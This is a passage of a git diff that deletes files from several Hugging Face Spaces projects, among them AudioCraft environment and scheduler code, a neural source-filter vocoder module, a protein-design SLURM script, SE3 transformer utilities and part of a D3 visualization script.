np.mean(np.sqrt(np.sum((registered_landmarks[self.t_shape_idx, 0:3] - anchor_t_shape) ** 2, axis=1))) - # print(err, distance, itr) - - # Step 5 : Save is requested - registered_landmarks_to_save.append([frame_id] + list(registered_landmarks[:, 0:3].reshape(-1))) - registered_affine_mat_to_save.append([frame_id] + list(T.reshape(-1))) - - # Step 5.5 (optional) : visualize ori / registered faces (Isolated in Black BG) - if (display): - img = np.zeros((h, w * 2, 3), np.uint8) - self.__vis_landmark_on_img__(img, landmarks.astype(np.int)) - registered_landmarks[:, 0] += w - self.__vis_landmark_on_img__(img, registered_landmarks.astype(np.int)) - cv2.imshow('img', img) - if (cv2.waitKey(30) == ord('q')): - break - - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_fl_sm.txt' - .format(self.idx, self.video_name[:-4])), - lines, fmt='%.6f') - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_fl_reg.txt' - .format(self.idx, self.video_name[:-4])), - np.array(registered_landmarks_to_save), fmt='%.6f') - np.savetxt(os.path.join(self.out_dir, 'register_fl3d', '{:05d}_{}_mat_reg.txt' - .format(self.idx, self.video_name[:-4])), - np.array(registered_affine_mat_to_save), fmt='%.6f') - - -if __name__ == '__main__': - video_dir = r'C:\Users\yangzhou\Videos\004_1.mp4' - out_dir = r'C:\Users\yangzhou\Videos' - c = Av2Flau_Convertor(video_dir, out_dir, idx=0) - c.convert() - diff --git a/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py b/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py deleted file mode 100644 index adc7819305758bb50a9984928bfa7f13eabef5f5..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/AudioCraft_Plus/audiocraft/environment.py +++ /dev/null @@ -1,176 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Provides cluster and tools configuration across clusters (slurm, dora, utilities). -""" - -import logging -import os -from pathlib import Path -import re -import typing as tp - -import omegaconf - -from .utils.cluster import _guess_cluster_type - - -logger = logging.getLogger(__name__) - - -class AudioCraftEnvironment: - """Environment configuration for teams and clusters. - - AudioCraftEnvironment picks compute cluster settings (slurm, dora) from the current running environment - or declared variable and the loaded team configuration. Additionally, the AudioCraftEnvironment - provides pointers to a reference folder resolved automatically across clusters that is shared across team members, - allowing to share sigs or other files to run jobs. Finally, it provides dataset mappers to automatically - map dataset file paths to new locations across clusters, allowing to use the same manifest of files across cluters. - - The cluster type is identified automatically and base configuration file is read from config/teams.yaml. - Use the following environment variables to specify the cluster, team or configuration: - - AUDIOCRAFT_CLUSTER (optional): Cluster type to enforce. Useful if the cluster type - cannot be inferred automatically. - AUDIOCRAFT_CONFIG (optional): Path to yaml config holding the teams configuration. - If not set, configuration is read from config/teams.yaml. - AUDIOCRAFT_TEAM (optional): Name of the team. Recommended to set to your own team. - Cluster configuration are shared across teams to match compute allocation, - specify your cluster configuration in the configuration file under a key mapping - your team name. - """ - _instance = None - DEFAULT_TEAM = "default" - - def __init__(self) -> None: - """Loads configuration.""" - self.team: str = os.getenv("AUDIOCRAFT_TEAM", self.DEFAULT_TEAM) - cluster_type = _guess_cluster_type() - cluster = os.getenv( - "AUDIOCRAFT_CLUSTER", cluster_type.value - ) - logger.info("Detecting cluster type %s", cluster_type) - - self.cluster: str = cluster - - config_path = os.getenv( - "AUDIOCRAFT_CONFIG", - Path(__file__) - .parent.parent.joinpath("config/teams", self.team) - .with_suffix(".yaml"), - ) - self.config = omegaconf.OmegaConf.load(config_path) - self._dataset_mappers = [] - cluster_config = self._get_cluster_config() - if "dataset_mappers" in cluster_config: - for pattern, repl in cluster_config["dataset_mappers"].items(): - regex = re.compile(pattern) - self._dataset_mappers.append((regex, repl)) - - def _get_cluster_config(self) -> omegaconf.DictConfig: - assert isinstance(self.config, omegaconf.DictConfig) - return self.config[self.cluster] - - @classmethod - def instance(cls): - if cls._instance is None: - cls._instance = cls() - return cls._instance - - @classmethod - def reset(cls): - """Clears the environment and forces a reload on next invocation.""" - cls._instance = None - - @classmethod - def get_team(cls) -> str: - """Gets the selected team as dictated by the AUDIOCRAFT_TEAM env var. - If not defined, defaults to "labs". - """ - return cls.instance().team - - @classmethod - def get_cluster(cls) -> str: - """Gets the detected cluster. - This value can be overridden by the AUDIOCRAFT_CLUSTER env var. - """ - return cls.instance().cluster - - @classmethod - def get_dora_dir(cls) -> Path: - """Gets the path to the dora directory for the current team and cluster. - Value is overridden by the AUDIOCRAFT_DORA_DIR env var. - """ - cluster_config = cls.instance()._get_cluster_config() - dora_dir = os.getenv("AUDIOCRAFT_DORA_DIR", cluster_config["dora_dir"]) - logger.warning(f"Dora directory: {dora_dir}") - return Path(dora_dir) - - @classmethod - def get_reference_dir(cls) -> Path: - """Gets the path to the reference directory for the current team and cluster. - Value is overridden by the AUDIOCRAFT_REFERENCE_DIR env var. - """ - cluster_config = cls.instance()._get_cluster_config() - return Path(os.getenv("AUDIOCRAFT_REFERENCE_DIR", cluster_config["reference_dir"])) - - @classmethod - def get_slurm_exclude(cls) -> tp.Optional[str]: - """Get the list of nodes to exclude for that cluster.""" - cluster_config = cls.instance()._get_cluster_config() - return cluster_config.get("slurm_exclude") - - @classmethod - def get_slurm_partitions(cls, partition_types: tp.Optional[tp.List[str]] = None) -> str: - """Gets the requested partitions for the current team and cluster as a comma-separated string. - - Args: - partition_types (list[str], optional): partition types to retrieve. Values must be - from ['global', 'team']. If not provided, the global partition is returned. - """ - if not partition_types: - partition_types = ["global"] - - cluster_config = cls.instance()._get_cluster_config() - partitions = [ - cluster_config["partitions"][partition_type] - for partition_type in partition_types - ] - return ",".join(partitions) - - @classmethod - def resolve_reference_path(cls, path: tp.Union[str, Path]) -> Path: - """Converts reference placeholder in path with configured reference dir to resolve paths. - - Args: - path (str or Path): Path to resolve. - Returns: - Path: Resolved path. - """ - path = str(path) - - if path.startswith("//reference"): - reference_dir = cls.get_reference_dir() - logger.warn(f"Reference directory: {reference_dir}") - assert ( - reference_dir.exists() and reference_dir.is_dir() - ), f"Reference directory does not exist: {reference_dir}." - path = re.sub("^//reference", str(reference_dir), path) - - return Path(path) - - @classmethod - def apply_dataset_mappers(cls, path: str) -> str: - """Applies dataset mapping regex rules as defined in the configuration. - If no rules are defined, the path is returned as-is. - """ - instance = cls.instance() - - for pattern, repl in instance._dataset_mappers: - path = pattern.sub(repl, path) - - return path diff --git a/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py b/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py deleted file mode 100644 index 03274a1ae52b6f20473973b77619f34b2bddd6a1..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py +++ /dev/null @@ -1,35 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import typing as tp - -from torch.optim import Optimizer -from torch.optim.lr_scheduler import _LRScheduler - - -class LinearWarmupLRScheduler(_LRScheduler): - """Inverse square root LR scheduler. - - Args: - optimizer (Optimizer): Torch optimizer. - warmup_steps (int): Number of warmup steps. - warmup_init_lr (tp.Optional[float]): Initial learning rate - during warmup phase. When not set, use the provided learning rate. - """ - def __init__(self, optimizer: Optimizer, warmup_steps: int, warmup_init_lr: tp.Optional[float] = 0): - self.warmup_steps = warmup_steps - self.warmup_init_lr = warmup_init_lr - super().__init__(optimizer) - - def _get_sched_lr(self, lr: float, step: int): - if step < self.warmup_steps: - warmup_init_lr = self.warmup_init_lr or 0 - lr_step = (lr - warmup_init_lr) / self.warmup_steps - lr = warmup_init_lr + step * lr_step - return lr - - def get_lr(self): - return [self._get_sched_lr(base_lr, self.last_epoch) for base_lr in self.base_lrs] diff --git a/spaces/maxime/chat-with-your-telegram-chat/cli_app.py b/spaces/maxime/chat-with-your-telegram-chat/cli_app.py deleted file mode 100644 index 20fd8a7af75f42f506c8230d673d23b2eea39cb6..0000000000000000000000000000000000000000 --- a/spaces/maxime/chat-with-your-telegram-chat/cli_app.py +++ /dev/null @@ -1,17 +0,0 @@ -import pickle -from query_data import get_chain - - -if __name__ == "__main__": - with open("vectorstore.pkl", "rb") as f: - vectorstore = pickle.load(f) - qa_chain = get_chain(vectorstore) - chat_history = [] - print("Chat with your docs!") - while True: - print("Human:") - question = input() - result = qa_chain({"question": question, "chat_history": chat_history}) - chat_history.append((question, result["answer"])) - print("AI:") - print(result["answer"]) diff --git a/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py b/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py deleted file mode 100644 index 1e9e6c7e344eb616a7ca427da1a02a2c2093c942..0000000000000000000000000000000000000000 --- a/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py +++ /dev/null @@ -1,394 +0,0 @@ -import torch -import numpy as np -import sys -import torch.nn.functional as torch_nn_func - - -class PulseGen(torch.nn.Module): - """Definition of Pulse train generator - - There are many ways to implement pulse generator. - Here, PulseGen is based on SinGen. For a perfect - """ - - def __init__(self, samp_rate, pulse_amp=0.1, noise_std=0.003, voiced_threshold=0): - super(PulseGen, self).__init__() - self.pulse_amp = pulse_amp - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - self.noise_std = noise_std - self.l_sinegen = SineGen( - self.sampling_rate, - harmonic_num=0, - sine_amp=self.pulse_amp, - noise_std=0, - voiced_threshold=self.voiced_threshold, - flag_for_pulse=True, - ) - - def forward(self, f0): - """Pulse train generator - pulse_train, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output pulse_train: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - - Note: self.l_sine doesn't make sure that the initial phase of - a voiced segment is np.pi, the first pulse in a voiced segment - may not be at the first time step within a voiced segment - """ - with torch.no_grad(): - sine_wav, uv, noise = self.l_sinegen(f0) - - # sine without additive noise - pure_sine = sine_wav - noise - - # step t corresponds to a pulse if - # sine[t] > sine[t+1] & sine[t] > sine[t-1] - # & sine[t-1], sine[t+1], and sine[t] are voiced - # or - # sine[t] is voiced, sine[t-1] is unvoiced - # we use torch.roll to simulate sine[t+1] and sine[t-1] - sine_1 = torch.roll(pure_sine, shifts=1, dims=1) - uv_1 = torch.roll(uv, shifts=1, dims=1) - uv_1[:, 0, :] = 0 - sine_2 = torch.roll(pure_sine, shifts=-1, dims=1) - uv_2 = torch.roll(uv, shifts=-1, dims=1) - uv_2[:, -1, :] = 0 - - loc = (pure_sine > sine_1) * (pure_sine > sine_2) \ - * (uv_1 > 0) * (uv_2 > 0) * (uv > 0) \ - + (uv_1 < 1) * (uv > 0) - - # pulse train without noise - pulse_train = pure_sine * loc - - # additive noise to pulse train - # note that noise from sinegen is zero in voiced regions - pulse_noise = torch.randn_like(pure_sine) * self.noise_std - - # with additive noise on pulse, and unvoiced regions - pulse_train += pulse_noise * loc + pulse_noise * (1 - uv) - return pulse_train, sine_wav, uv, pulse_noise - - -class SignalsConv1d(torch.nn.Module): - """Filtering input signal with time invariant filter - Note: FIRFilter conducted filtering given fixed FIR weight - SignalsConv1d convolves two signals - Note: this is based on torch.nn.functional.conv1d - - """ - - def __init__(self): - super(SignalsConv1d, self).__init__() - - def forward(self, signal, system_ir): - """output = forward(signal, system_ir) - - signal: (batchsize, length1, dim) - system_ir: (length2, dim) - - output: (batchsize, length1, dim) - """ - if signal.shape[-1] != system_ir.shape[-1]: - print("Error: SignalsConv1d expects shape:") - print("signal (batchsize, length1, dim)") - print("system_id (batchsize, length2, dim)") - print("But received signal: {:s}".format(str(signal.shape))) - print(" system_ir: {:s}".format(str(system_ir.shape))) - sys.exit(1) - padding_length = system_ir.shape[0] - 1 - groups = signal.shape[-1] - - # pad signal on the left - signal_pad = torch_nn_func.pad(signal.permute(0, 2, 1), (padding_length, 0)) - # prepare system impulse response as (dim, 1, length2) - # also flip the impulse response - ir = torch.flip(system_ir.unsqueeze(1).permute(2, 1, 0), dims=[2]) - # convolute - output = torch_nn_func.conv1d(signal_pad, ir, groups=groups) - return output.permute(0, 2, 1) - - -class CyclicNoiseGen_v1(torch.nn.Module): - """CyclicnoiseGen_v1 - Cyclic noise with a single parameter of beta. - Pytorch v1 implementation assumes f_t is also fixed - """ - - def __init__(self, samp_rate, noise_std=0.003, voiced_threshold=0): - super(CyclicNoiseGen_v1, self).__init__() - self.samp_rate = samp_rate - self.noise_std = noise_std - self.voiced_threshold = voiced_threshold - - self.l_pulse = PulseGen( - samp_rate, - pulse_amp=1.0, - noise_std=noise_std, - voiced_threshold=voiced_threshold, - ) - self.l_conv = SignalsConv1d() - - def noise_decay(self, beta, f0mean): - """decayed_noise = noise_decay(beta, f0mean) - decayed_noise = n[t]exp(-t * f_mean / beta / samp_rate) - - beta: (dim=1) or (batchsize=1, 1, dim=1) - f0mean (batchsize=1, 1, dim=1) - - decayed_noise (batchsize=1, length, dim=1) - """ - with torch.no_grad(): - # exp(-1.0 n / T) < 0.01 => n > -log(0.01)*T = 4.60*T - # truncate the noise when decayed by -40 dB - length = 4.6 * self.samp_rate / f0mean - length = length.int() - time_idx = torch.arange(0, length, device=beta.device) - time_idx = time_idx.unsqueeze(0).unsqueeze(2) - time_idx = time_idx.repeat(beta.shape[0], 1, beta.shape[2]) - - noise = torch.randn(time_idx.shape, device=beta.device) - - # due to Pytorch implementation, use f0_mean as the f0 factor - decay = torch.exp(-time_idx * f0mean / beta / self.samp_rate) - return noise * self.noise_std * decay - - def forward(self, f0s, beta): - """Producde cyclic-noise""" - # pulse train - pulse_train, sine_wav, uv, noise = self.l_pulse(f0s) - pure_pulse = pulse_train - noise - - # decayed_noise (length, dim=1) - if (uv < 1).all(): - # all unvoiced - cyc_noise = torch.zeros_like(sine_wav) - else: - f0mean = f0s[uv > 0].mean() - - decayed_noise = self.noise_decay(beta, f0mean)[0, :, :] - # convolute - cyc_noise = self.l_conv(pure_pulse, decayed_noise) - - # add noise in invoiced segments - cyc_noise = cyc_noise + noise * (1.0 - uv) - return cyc_noise, pulse_train, sine_wav, uv, noise - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - self.flag_for_pulse = flag_for_pulse - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def _f02sine(self, f0_values): - """f0_values: (batchsize, length, dim) - where dim indicates fundamental tone and overtones - """ - # convert to F0 in rad. The interger part n can be ignored - # because 2 * np.pi * n doesn't affect phase - rad_values = (f0_values / self.sampling_rate) % 1 - - # initial phase noise (no noise for fundamental component) - rand_ini = torch.rand( - f0_values.shape[0], f0_values.shape[2], device=f0_values.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - - # instantanouse phase sine[t] = sin(2*pi \sum_i=1 ^{t} rad) - if not self.flag_for_pulse: - # for normal case - - # To prevent torch.cumsum numerical overflow, - # it is necessary to add -1 whenever \sum_k=1^n rad_value_k > 1. - # Buffer tmp_over_one_idx indicates the time step to add -1. - # This will not change F0 of sine because (x-1) * 2*pi = x * 2*pi - tmp_over_one = torch.cumsum(rad_values, 1) % 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - - sines = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - else: - # If necessary, make sure that the first time step of every - # voiced segments is sin(pi) or cos(0) - # This is used for pulse-train generation - - # identify the last time step in unvoiced segments - uv = self._f02uv(f0_values) - uv_1 = torch.roll(uv, shifts=-1, dims=1) - uv_1[:, -1, :] = 1 - u_loc = (uv < 1) * (uv_1 > 0) - - # get the instantanouse phase - tmp_cumsum = torch.cumsum(rad_values, dim=1) - # different batch needs to be processed differently - for idx in range(f0_values.shape[0]): - temp_sum = tmp_cumsum[idx, u_loc[idx, :, 0], :] - temp_sum[1:, :] = temp_sum[1:, :] - temp_sum[0:-1, :] - # stores the accumulation of i.phase within - # each voiced segments - tmp_cumsum[idx, :, :] = 0 - tmp_cumsum[idx, u_loc[idx, :, 0], :] = temp_sum - - # rad_values - tmp_cumsum: remove the accumulation of i.phase - # within the previous voiced segment. - i_phase = torch.cumsum(rad_values - tmp_cumsum, dim=1) - - # get the sines - sines = torch.cos(i_phase * 2 * np.pi) - return sines - - def forward(self, f0): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * (idx + 2) - - # generate sine waveforms - sine_waves = self._f02sine(f0_buf) * self.sine_amp - - # generate uv signal - # uv = torch.ones(f0.shape) - # uv = uv * (f0 > self.voiced_threshold) - uv = self._f02uv(f0) - - # noise: for unvoiced should be similar to sine_amp - # std = self.sine_amp/3 -> max value ~ self.sine_amp - # . for voiced regions is self.noise_std - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - - # first: set the unvoiced part to 0 by uv - # then: additive noise - sine_waves = sine_waves * uv + noise - return sine_waves - - -class SourceModuleCycNoise_v1(torch.nn.Module): - """SourceModuleCycNoise_v1 - SourceModule(sampling_rate, noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - - noise_std: std of Gaussian noise (default: 0.003) - voiced_threshold: threshold to set U/V given F0 (default: 0) - - cyc, noise, uv = SourceModuleCycNoise_v1(F0_upsampled, beta) - F0_upsampled (batchsize, length, 1) - beta (1) - cyc (batchsize, length, 1) - noise (batchsize, length, 1) - uv (batchsize, length, 1) - """ - - def __init__(self, sampling_rate, noise_std=0.003, voiced_threshod=0): - super(SourceModuleCycNoise_v1, self).__init__() - self.sampling_rate = sampling_rate - self.noise_std = noise_std - self.l_cyc_gen = CyclicNoiseGen_v1(sampling_rate, noise_std, voiced_threshod) - - def forward(self, f0_upsamped, beta): - """ - cyc, noise, uv = SourceModuleCycNoise_v1(F0, beta) - F0_upsampled (batchsize, length, 1) - beta (1) - cyc (batchsize, length, 1) - noise (batchsize, length, 1) - uv (batchsize, length, 1) - """ - # source for harmonic branch - cyc, pulse, sine, uv, add_noi = self.l_cyc_gen(f0_upsamped, beta) - - # source for noise branch, in the same shape as uv - noise = torch.randn_like(uv) * self.noise_std / 3 - return cyc, noise, uv - - -class SourceModuleHnNSF(torch.nn.Module): - def __init__( - self, - sampling_rate=32000, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - ): - super(SourceModuleHnNSF, self).__init__() - harmonic_num = 10 - self.sine_amp = sine_amp - self.noise_std = add_noise_std - - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_tanh = torch.nn.Tanh() - self.register_buffer('merge_w', torch.FloatTensor([[ - 0.2942, -0.2243, 0.0033, -0.0056, -0.0020, -0.0046, - 0.0221, -0.0083, -0.0241, -0.0036, -0.0581]])) - self.register_buffer('merge_b', torch.FloatTensor([0.0008])) - - def forward(self, x): - """ - Sine_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - """ - # source for harmonic branch - sine_wavs = self.l_sin_gen(x) - sine_wavs = torch_nn_func.linear( - sine_wavs, self.merge_w) + self.merge_b - sine_merge = self.l_tanh(sine_wavs) - return sine_merge diff --git a/spaces/mb1te/PSII_FINAL/README.md b/spaces/mb1te/PSII_FINAL/README.md deleted file mode 100644 index 1091062a0aeb5270aa2e882889fd7c02e0bcdc16..0000000000000000000000000000000000000000 --- a/spaces/mb1te/PSII_FINAL/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: PSII FINAL -emoji: 📊 -colorFrom: blue -colorTo: green -sdk: docker -pinned: false -license: apache-2.0 -app_port: 8080 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh b/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh deleted file mode 100644 index ae66f0273cb2d3fa893717d7f3102ae01bd957b7..0000000000000000000000000000000000000000 --- a/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash -#SBATCH -J seq_diff -#SBATCH -p gpu -#SBATCH --mem=8g -#SBATCH --gres=gpu:a6000:1 -#SBATCH -o ./out/slurm/slurm_%j.out - -source activate /software/conda/envs/SE3nv - -srun python ../inference.py \ - --num_designs 10 \ - --out out/binder_design \ - --pdb pdbs/cd86.pdb \ - --T 25 --save_best_plddt \ - --contigs B1-110,0 25-75 \ - --hotspots B40,B32,B87,B96,B30 diff --git a/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py b/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py deleted file mode 100644 index b6248fa6e5d94a14df6726eb73274a4727281a63..0000000000000000000000000000000000000000 --- a/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py +++ /dev/null @@ -1,130 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# Permission is hereby granted, free of charge, to any person obtaining a -# copy of this software and associated documentation files (the "Software"), -# to deal in the Software without restriction, including without limitation -# the rights to use, copy, modify, merge, publish, distribute, sublicense, -# and/or sell copies of the Software, and to permit persons to whom the -# Software is furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL -# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER -# DEALINGS IN THE SOFTWARE. -# -# SPDX-FileCopyrightText: Copyright (c) 2021 NVIDIA CORPORATION & AFFILIATES -# SPDX-License-Identifier: MIT - -import argparse -import ctypes -import logging -import os -import random -from functools import wraps -from typing import Union, List, Dict - -import numpy as np -import torch -import torch.distributed as dist -from torch import Tensor - - -def aggregate_residual(feats1, feats2, method: str): - """ Add or concatenate two fiber features together. If degrees don't match, will use the ones of feats2. """ - if method in ['add', 'sum']: - return {k: (v + feats1[k]) if k in feats1 else v for k, v in feats2.items()} - elif method in ['cat', 'concat']: - return {k: torch.cat([v, feats1[k]], dim=1) if k in feats1 else v for k, v in feats2.items()} - else: - raise ValueError('Method must be add/sum or cat/concat') - - -def degree_to_dim(degree: int) -> int: - return 2 * degree + 1 - - -def unfuse_features(features: Tensor, degrees: List[int]) -> Dict[str, Tensor]: - return dict(zip(map(str, degrees), features.split([degree_to_dim(deg) for deg in degrees], dim=-1))) - - -def str2bool(v: Union[bool, str]) -> bool: - if isinstance(v, bool): - return v - if v.lower() in ('yes', 'true', 't', 'y', '1'): - return True - elif v.lower() in ('no', 'false', 'f', 'n', '0'): - return False - else: - raise argparse.ArgumentTypeError('Boolean value expected.') - - -def to_cuda(x): - """ Try to convert a Tensor, a collection of Tensors or a DGLGraph to CUDA """ - if isinstance(x, Tensor): - return x.cuda(non_blocking=True) - elif isinstance(x, tuple): - return (to_cuda(v) for v in x) - elif isinstance(x, list): - return [to_cuda(v) for v in x] - elif isinstance(x, dict): - return {k: to_cuda(v) for k, v in x.items()} - else: - # DGLGraph or other objects - return x.to(device=torch.cuda.current_device()) - - -def get_local_rank() -> int: - return int(os.environ.get('LOCAL_RANK', 0)) - - -def init_distributed() -> bool: - world_size = int(os.environ.get('WORLD_SIZE', 1)) - distributed = world_size > 1 - if distributed: - backend = 'nccl' if torch.cuda.is_available() else 'gloo' - dist.init_process_group(backend=backend, init_method='env://') - if backend == 'nccl': - torch.cuda.set_device(get_local_rank()) - else: - logging.warning('Running on CPU only!') - assert torch.distributed.is_initialized() - return distributed - - -def increase_l2_fetch_granularity(): - # maximum fetch granularity of L2: 128 bytes - _libcudart = ctypes.CDLL('libcudart.so') - # set device limit on the current device - # cudaLimitMaxL2FetchGranularity = 0x05 - pValue = ctypes.cast((ctypes.c_int * 1)(), ctypes.POINTER(ctypes.c_int)) - _libcudart.cudaDeviceSetLimit(ctypes.c_int(0x05), ctypes.c_int(128)) - _libcudart.cudaDeviceGetLimit(pValue, ctypes.c_int(0x05)) - assert pValue.contents.value == 128 - - -def seed_everything(seed): - seed = int(seed) - random.seed(seed) - np.random.seed(seed) - torch.manual_seed(seed) - torch.cuda.manual_seed_all(seed) - - -def rank_zero_only(fn): - @wraps(fn) - def wrapped_fn(*args, **kwargs): - if not dist.is_initialized() or dist.get_rank() == 0: - return fn(*args, **kwargs) - - return wrapped_fn - - -def using_tensor_cores(amp: bool) -> bool: - major_cc, minor_cc = torch.cuda.get_device_capability() - return (amp and major_cc >= 7) or major_cc >= 8 diff --git a/spaces/merve/anonymization/source/fill-in-the-blank/init.js b/spaces/merve/anonymization/source/fill-in-the-blank/init.js deleted file mode 100644 index 2e61759b05c45666ac2013000d8c4da1bc367630..0000000000000000000000000000000000000000 --- a/spaces/merve/anonymization/source/fill-in-the-blank/init.js +++ /dev/null @@ -1,426 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - -window.ttSel = d3.select('body').selectAppend('div.tooltip.tooltip-hidden') - -window.palette = function palette(min, max){ - // https://blocks.roadtolarissa.com/1wheel/raw/94091c1f8a69d5966e48aef4ac19baf9/index.html?colors=00006e-006a78-00a963-8a8a8a-d5882a-a15142-7f0000&numTicks=255&space=lab&type=basis - var colors = ['#00006e', '#00006e', '#00006f', '#00006f', '#00006f', '#000070', '#000070', '#000170', '#000471', '#000871', '#000b71', '#000f72', '#001272', '#001572', '#001872', '#001b73', '#001e73', '#002173', '#002473', '#002674', '#002974', '#002c74', '#002e74', '#003174', '#003375', '#003675', '#003975', '#003b75', '#003e75', '#004075', '#004375', '#004575', '#004775', '#004a75', '#004c75', '#004f75', '#005175', '#005375', '#005675', '#005875', '#005a75', '#005c75', '#005e75', '#006175', '#006375', '#006574', '#006774', '#006974', '#006b74', '#006d74', '#006f73', '#007173', '#007373', '#007473', '#007672', '#007872', '#007a72', '#007b72', '#007d71', '#007f71', '#008071', '#008270', '#008370', '#008570', '#008670', '#00886f', '#00896f', '#008a6f', '#008c6f', '#008d6e', '#008e6e', '#008f6e', '#00906e', '#00916e', '#00926d', '#00936d', '#00946d', '#00956d', '#00966d', '#00976d', '#00976d', '#00986d', '#00996d', '#00996d', '#009a6d', '#009a6e', '#009b6e', '#009b6e', '#009b6e', '#079c6f', '#119c6f', '#189c6f', '#1e9c70', '#249c70', '#289c70', '#2d9c71', '#319c71', '#359c71', '#399c72', '#3c9c72', '#409c73', '#439c73', '#479b74', '#4a9b74', '#4d9b74', '#509b75', '#539a75', '#569a76', '#599976', '#5c9976', '#5f9976', '#629877', '#659877', '#679777', '#6a9777', '#6d9677', '#6f9678', '#729578', '#749578', '#779478', '#799477', '#7c9377', '#7e9377', '#819277', '#839277', '#859176', '#889176', '#8a9175', '#8c9075', '#8e9074', '#908f73', '#938f73', '#958e72', '#978e71', '#998e70', '#9b8d6f', '#9d8d6e', '#9f8d6d', '#a08c6c', '#a28c6b', '#a48c69', '#a68b68', '#a88b67', '#a98b65', '#ab8a64', '#ac8a63', '#ae8a61', '#af8960', '#b1895f', '#b2895d', '#b4885c', '#b5885a', 